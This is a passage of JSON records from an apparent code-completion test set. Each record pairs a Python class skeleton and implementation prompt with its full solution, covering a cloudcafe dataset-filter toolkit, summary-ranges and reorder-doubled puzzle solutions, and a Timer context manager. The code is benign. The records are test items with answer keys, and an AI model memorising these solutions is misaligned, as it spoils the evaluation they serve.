cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "class_docstring": "Collection of dataset generators and helper methods for developing data driven tests", "class_name": "ModelBasedDatasetToolkit", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000017", "length_bytes": 3872, "license_type": "permissive", "methods": [{"docstring": "Gets list of all models in the environment.", "name": "_get_model_list", "signature": "def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs)"}, {"docstring": "Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.", "name": "_filter_model_list", "signature": "def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None)"}, {"docstring": "Aggregates common modifiers for dataset lists", "name": "_modify_dataset_list", "signature": "def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False)"}], "n_methods": 3, "prompt": "Implement the Python class `ModelBasedDatasetToolkit` described below.\n\nClass description:\nCollection of dataset generators and helper methods for developing data driven tests\n\nMethod signatures and docstrings:\n- def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs): Gets list of all models in the environment.\n- def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None): Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\n- def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False): Aggregates common modifiers for dataset lists", "prompted_full_text": "Implement the Python class `ModelBasedDatasetToolkit` described below.\n\nClass description:\nCollection of dataset generators and helper methods for developing data driven tests\n\nMethod signatures and docstrings:\n- def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs): Gets list of all models in the environment.\n- def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None): Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\n- def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False): Aggregates common modifiers for dataset lists\n\n<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n<|end_body_1|>\n\n<|body_start_2|>\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n<|end_body_2|>\n", "revision_id": "7d49cf6bfd7e1a6e5b739e7de52f2e18e5ccf924", "skeleton": "<|skeleton|>\nclass ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n <|body_0|>\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n <|body_1|>\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModelBasedDatasetToolkit:\n \"\"\"Collection of dataset generators and helper methods for developing data driven tests\"\"\"\n\n def _get_model_list(cls, get_model_list_method, model_type_name, *get_method_args, **get_method_kwargs):\n \"\"\"Gets list of all models in the environment.\"\"\"\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n\n def _filter_model_list(cls, model_list, model_filter=None, filter_mode=None):\n \"\"\"Filters should be dictionaries with model attributes as keys and lists of attributes as key values. example: {\"id\": [\"12345\", \"42\"]} Include only those models who match at least one criteria in the model_filter dictionary. filter_mode can be 'inclusion' or 'exclusion'. inclusion mode will include models that match any attributes in the model_filter in the final model_list. exclusion mode will exclude any models that match attributes in the model-filer from the final model_list.\"\"\"\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\n return final_list\n\n def _modify_dataset_list(cls, dataset_list, max_datasets=None, randomize=False):\n \"\"\"Aggregates common modifiers for dataset lists\"\"\"\n if randomize:\n shuffle(dataset_list)\n if max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\n return dataset_list\n", "source": "the_stack_v2_python_sparse", "source_path": "cloudcafe/common/datasets.py", "source_repo": "kurhula/cloudcafe", "split": "test", "star_events_count": 0} {"blob_id": "f0cd623056a2bb137ff21dcf8f159717f0f1d627", "bodies": ["ans = []\nstart = 0\nfor p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\nreturn ans", "start = 0\nans = []\nnums.append(float('INF'))\nfor i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\nreturn ans"], "bodies_text": "<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000018", "length_bytes": 1366, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_group", "signature": "def summaryRanges_group(self, nums)"}, {"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_onepass", "signature": "def summaryRanges_onepass(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges_group(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_onepass(self, nums): :type nums: List[int] :rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges_group(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_onepass(self, nums): :type nums: List[int] :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n<|end_body_1|>\n", "revision_id": "0e99f9a5226507706b3ee66fd04bae813755ef40", "skeleton": "<|skeleton|>\nclass Solution:\n\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def summaryRanges_group(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n ans = []\n start = 0\n for p, group in itertools.groupby([n - v for n, v in enumerate(nums)]):\n interval = len(list(group))\n end = start + interval\n if interval == 1:\n ans.append(str(nums[start]))\n else:\n ans.append('{}->{}'.format(nums[start], nums[end - 1]))\n start = end\n return ans\n\n def summaryRanges_onepass(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n start = 0\n ans = []\n nums.append(float('INF'))\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1] + 1:\n if i - 1 == start:\n ans.append(str(nums[start]))\n else:\n ans.append(str(nums[start]) + '->' + str(nums[i - 1]))\n start = i\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/arrayandstring/test_228_Summary_Ranges.py", "source_repo": "wuxu1019/leetcode_sophia", "split": "test", "star_events_count": 1} {"blob_id": "ea0a5546d075ac8df98d2a3cf61382bf514b33df", "bodies": ["try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\nexcept KeyError:\n prepend = ''\n append = ''\nself.txt = prepend + txt + append\nself.newline = newline", "self.start = time()\nif not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\nelse:\n print(self.txt + '... ')", "if self.newline:\n print(self.txt + ' done in ', end='')\nprint('{:.2f} sec.'.format(time() - self.start))"], "bodies_text": "<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "class_docstring": "Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something", "class_name": "Timer", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000019", "length_bytes": 1784, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.", "name": "__init__", "signature": "def __init__(self, txt: str, newline: bool=False, color: str=None)"}, {"docstring": "Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.", "name": "__enter__", "signature": "def __enter__(self)"}, {"docstring": "Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.", "name": "__exit__", "signature": "def __exit__(self, type, value, tb)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000464", "prompt": "Implement the Python class `Timer` described below.\n\nClass description:\nExample of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\n\nMethod signatures and docstrings:\n- def __init__(self, txt: str, newline: bool=False, color: str=None): Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\n- def __enter__(self): Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\n- def __exit__(self, type, value, tb): Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.", "prompted_full_text": "Implement the Python class `Timer` described below.\n\nClass description:\nExample of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\n\nMethod signatures and docstrings:\n- def __init__(self, txt: str, newline: bool=False, color: str=None): Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\n- def __enter__(self): Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\n- def __exit__(self, type, value, tb): Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\n\n<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n<|end_body_0|>\n\n<|body_start_1|>\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n<|end_body_2|>\n", "revision_id": "229456e0d4a9b73c0fd1069b062ca02c49dece00", "skeleton": "<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n", "source": "the_stack_v2_python_sparse", "source_path": "dwi_ml/experiment_utils/timer.py", "source_repo": "scil-vital/dwi_ml", "split": "test", "star_events_count": 8} {"blob_id": "9417caf6ac83a47534fe489d4a6e970474db0986", "bodies": ["import collections\nA = sorted(A, key=lambda a: abs(a))\ncount_A = collections.Counter(A)\nfor a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\nreturn True", "from collections import defaultdict\ncts = defaultdict(int)\nfor v in A:\n cts[v] += 1\nkeys = cts.keys()\nfor k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\nnegs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\npos = sorted([k for k in keys if cts[k] > 0 and k > 0])\nzeros = cts[0]\nif zeros % 2 == 1:\n return False\nkeys = [-k for k in negs] + pos\nfor k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\nreturn True"], "bodies_text": "<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000020", "length_bytes": 2474, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int] :rtype: bool 400 ms", "name": "canReorderDoubled", "signature": "def canReorderDoubled(self, A)"}, {"docstring": ":type A: List[int] :rtype: bool 120ms", "name": "canReorderDoubled_1", "signature": "def canReorderDoubled_1(self, A)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000674", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canReorderDoubled(self, A): :type A: List[int] :rtype: bool 400 ms\n- def canReorderDoubled_1(self, A): :type A: List[int] :rtype: bool 120ms", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canReorderDoubled(self, A): :type A: List[int] :rtype: bool 400 ms\n- def canReorderDoubled_1(self, A): :type A: List[int] :rtype: bool 120ms\n\n<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "revision_id": "679a2b246b8b6bb7fc55ed1c8096d3047d6d4461", "skeleton": "<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n 